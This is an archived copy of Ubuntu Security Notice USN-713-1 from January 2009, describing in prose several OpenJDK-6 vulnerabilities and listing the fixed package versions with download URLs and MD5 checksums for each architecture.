for <lists@securityspace.com>; Wed, 28 Jan 2009 11:14:38 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 16ECA2370E2; Wed, 28 Jan 2009 08:44:42 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 22537 invoked from network); 27 Jan 2009 22:11:26 -0000
Date: Tue, 27 Jan 2009 14:37:30 -0800
From: Kees Cook <kees@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-713-1] openjdk-6 vulnerabilities
Message-ID: <20090127223730.GB7859@outflux.net>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="d9ADC0YsG2v16Js0"
Content-Disposition: inline
Organization: Ubuntu
X-MIMEDefang-Filter: outflux$Revision: 1.316 $
X-HELO: www.outflux.net
X-Scanned-By: MIMEDefang 2.64 on 10.2.0.1
Status:   


--d9ADC0YsG2v16Js0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

==========================================================Ubuntu Security Notice USN-713-1           January 27, 2009
openjdk-6 vulnerabilities
CVE-2008-5347, CVE-2008-5348, CVE-2008-5349, CVE-2008-5350,
CVE-2008-5351, CVE-2008-5352, CVE-2008-5353, CVE-2008-5354,
CVE-2008-5358, CVE-2008-5359, CVE-2008-5360
==========================================================
A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  icedtea6-plugin                 6b12-0ubuntu6.1
  openjdk-6-jdk                   6b12-0ubuntu6.1
  openjdk-6-jre                   6b12-0ubuntu6.1
  openjdk-6-jre-headless          6b12-0ubuntu6.1
  openjdk-6-jre-lib               6b12-0ubuntu6.1

After a standard system upgrade you need to restart any Java applications
to effect the necessary changes.

Details follow:

It was discovered that Java did not correctly handle untrusted applets.
If a user were tricked into running a malicious applet, a remote attacker
could gain user privileges, or list directory contents. (CVE-2008-5347,
CVE-2008-5350)

It was discovered that Kerberos authentication and RSA public key
processing were not correctly handled in Java.  A remote attacker
could exploit these flaws to cause a denial of service. (CVE-2008-5348,
CVE-2008-5349)

It was discovered that Java accepted UTF-8 encodings that might be
handled incorrectly by certain applications.  A remote attacker could
bypass string filters, possible leading to other exploits. (CVE-2008-5351)

Overflows were discovered in Java JAR processing.  If a user or
automated system were tricked into processing a malicious JAR file,
a remote attacker could crash the application, leading to a denial of
service. (CVE-2008-5352, CVE-2008-5354)

It was discovered that Java calendar objects were not unserialized safely.
If a user or automated system were tricked into processing a specially
crafted calendar object, a remote attacker could execute arbitrary code
with user privileges. (CVE-2008-5353)

It was discovered that the Java image handling code could lead to memory
corruption.  If a user or automated system were tricked into processing
a specially crafted image, a remote attacker could crash the application,
leading to a denial of service. (CVE-2008-5358, CVE-2008-5359)

It was discovered that temporary files created by Java had predictable
names.  If a user or automated system were tricked into processing a
specially crafted JAR file, a remote attacker could overwrite sensitive
information.  (CVE-2008-5360)


Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.1.diff.gz
      Size/MD5:   222090 25681e25a40ae36385d2429e8b905009
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.1.dsc
      Size/MD5:     2355 281bc682638116538e829499572e3cde
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12.orig.tar.gz
      Size/MD5: 54363262 f3aa01206f2192464b998fb7cc550686

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-doc_6b12-0ubuntu6.1_all.deb
      Size/MD5:  8468244 7746db24f22ff25e7655bd9ad73b7077
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-lib_6b12-0ubuntu6.1_all.deb
      Size/MD5:  4708568 3e9ffbcebcadc431e5c1a21b80e9a9b7
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-source_6b12-0ubuntu6.1_all.deb
      Size/MD5: 25619670 4eb18b9cdd11778e80ce6b1ac63c2040
    http://security.ubuntu.com/ubuntu/pool/universe/o/openjdk-6/openjdk-6-source-files_6b12-0ubuntu6.1_all.deb
      Size/MD5: 49156890 044fa2fafc22c35568c01e46f85dbf0a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_amd64.deb
      Size/MD5:    81028 8f3c35e45a001a5bb5e7d7231656e206
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_amd64.deb
      Size/MD5: 47370572 db9493bf071aa08183a7aeef6efc71ea
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_amd64.deb
      Size/MD5:  2366078 639ac32c62c5b951a77a0a58fcf8ee70
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_amd64.deb
      Size/MD5:  9942620 ac6600eb8cddc9afd55d37a646ba3a89
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_amd64.deb
      Size/MD5: 24087518 d9b0e9f7a0f6df9392eed8c67fa77acd
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_amd64.deb
      Size/MD5:   241532 404e268000d8d15e903f67eb4383146e

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_i386.deb
      Size/MD5:    71520 9af6963e6ddc977bd05a8dbbe40f1139
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_i386.deb
      Size/MD5: 101844924 fcdcbeacbb5f2854f68efa196e6d0ab3
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_i386.deb
      Size/MD5:  2348616 6313881219ebbee2ee650685bcb6105f
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_i386.deb
      Size/MD5:  9949838 366df23097c855e2d329dec6bf9f9d24
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_i386.deb
      Size/MD5: 25169062 1354f7327a8df3422a442f37b357f77a
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_i386.deb
      Size/MD5:   230678 59ed425557f18fba815bcbf9b17c6d1d

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_lpia.deb
      Size/MD5:    72102 c3317b35cd38f7b4ab607bf49331e440
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_lpia.deb
      Size/MD5: 101930608 292954d99c81b528891824548c6b885e
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_lpia.deb
      Size/MD5:  2345410 fc2cd7ec4e96749e39307f756231fdc3
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_lpia.deb
      Size/MD5:  9945176 4a8fb4a2b021f7ce6729dca9b0eef67c
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_lpia.deb
      Size/MD5: 25192978 cccb11f6580b47ab30c981a0a8cea0f6
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_lpia.deb
      Size/MD5:   227450 abf58752fcf129175266e60b86857f8c

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_powerpc.deb
      Size/MD5:    77056 790776ea3f41a2392e6c9666402428c0
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_powerpc.deb
      Size/MD5: 35896200 55947cfd47a40e248a626adcb601b4da
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_powerpc.deb
      Size/MD5:  2393068 c475228e916c602eea348b0382f51f21
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_powerpc.deb
      Size/MD5:  8599254 97e338f60e55a488ef0ba06bc23cf414
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_powerpc.deb
      Size/MD5: 22974726 e3bf13b8599a94a0b89f2757a90800f5
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_powerpc.deb
      Size/MD5:   255456 54b666eaaf464931a56406d09cfff088

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_sparc.deb
      Size/MD5:    70100 b4addb80ceb8e01dd8819a1bc3b8c89a
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_sparc.deb
      Size/MD5: 103684964 9f7150e6e1675831b723cdbae5b5c963
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_sparc.deb
      Size/MD5:  2355110 38f63636383fcb60ba60552ca4e0c60c
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_sparc.deb
      Size/MD5:  9927636 7c32c7c800f01a2dc1ae878eceade91d
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_sparc.deb
      Size/MD5: 25175260 a09637fa2629b9ffa58d932078a44d67
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_sparc.deb
      Size/MD5:   232954 17e8a53c99ea3ac34c0018b2e60a2be8

New User Registration
Email:
UserID:
Passwd:
Please email me your monthly newsletters, informing the latest services, improvements & surveys.
Please email me a vulnerability test announcement whenever a new test is added.
   Privacy
Registered User Login
 
UserID:   
Passwd:  

 Forgot userid or passwd?
Email/Userid:




Home | About Us | Contact Us | Partner Programs | Developer APIs | Privacy | Mailing Lists | Abuse
Security Audits | Managed DNS | Network Monitoring | Site Analyzer | Internet Research Reports
Web Probe

© 1998-2019 E-Soft Inc. All rights reserved.